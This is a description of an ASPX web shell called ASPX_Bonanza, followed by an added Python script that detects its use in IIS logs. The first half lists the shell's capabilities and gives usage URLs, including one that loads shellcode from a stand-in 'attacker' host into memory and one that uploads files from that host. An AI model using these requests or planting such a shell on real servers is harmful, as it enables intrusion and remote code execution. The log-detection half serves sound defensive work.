ASPX_Bonanza is a multi-featured ASPX shell with a unique use case. Its features include executing shellcode in memory. The script logs on directly with the credentials of the user being impersonated, so it does not require the SeImpersonate privilege for the user running IIS.
impersonate_bonanza.aspx requires valid credentials to get the token and impersonate the user.

bonanza.aspx does not require credentials and will run as the current user without impersonating.
- Execute shellcode in memory
- Download and Upload files
- List directories
- Cat files
- List processes
To impersonate the user you want, edit the username, domain & password in the source code.
https://url/impersonate_bonanza.aspx?shellcodeUrl=https://attacker/shellcode.bin
https://url/impersonate_bonanza.aspx?dir=C:\users\public
https://url/impersonate_bonanza.aspx?FileDownload=C:\users\public\FILE
https://url/impersonate_bonanza.aspx?UploadSource=https://attacker/FILE&UploadDestination=C:\users\public\FILE
https://url/impersonate_bonanza.aspx?Cat=C:\users\public\FILE
https://url/impersonate_bonanza.aspx?Process=1
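
Seen from the defender's side, the parameter names in the URLs above end up in the `cs-uri-query` field of IIS W3C logs. The following added example (not part of the project) flags `.aspx` requests that carry them; the function names, the field layout and the sample log lines are constructed for illustration, and the generic `Process` parameter is left out as an assumption to limit false positives.

```python
import re
from urllib.parse import parse_qsl

# Parameter names taken from the usage URLs on this page (compared lower-case).
STRONG = {"shellcodeurl", "filedownload", "uploadsource", "uploaddestination"}
PATHY = {"dir", "cat"}  # generic names: only count when the value is a Windows path
WIN_PATH = re.compile(r"^(?:[a-zA-Z]:[\\/]|\\\\)")

# Constructed sample log, not taken from a real server.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:00 GET /app/default.aspx dir=asc&page=2 198.51.100.7 200
2024-01-01 10:00:05 GET /uploads/x.aspx dir=C:%5Cusers%5Cpublic 203.0.113.9 200
2024-01-01 10:00:09 GET /uploads/x.aspx UploadSource=https://example.invalid/f&UploadDestination=C:\\users\\public\\f 203.0.113.9 200
2024-01-01 10:00:12 GET /index.html - 198.51.100.7 200
""".splitlines()

def parse_w3c(lines):
    """Yield one dict per W3C log entry, keyed by the names in the #Fields header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def suspicious_params(entry):
    """Return the sorted matching parameter names for one log entry, or []."""
    if not entry.get("cs-uri-stem", "").lower().endswith(".aspx"):
        return []
    query = entry.get("cs-uri-query", "-")
    if query == "-":  # IIS writes '-' when there is no query string
        return []
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):  # decodes %5C etc.
        key = name.lower()
        if key in STRONG or (key in PATHY and WIN_PATH.match(value)):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Return (client IP, URI stem, matched parameters) for each flagged request."""
    return [(e["c-ip"], e["cs-uri-stem"], hits)
            for e in parse_w3c(lines) if (hits := suspicious_params(e))]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
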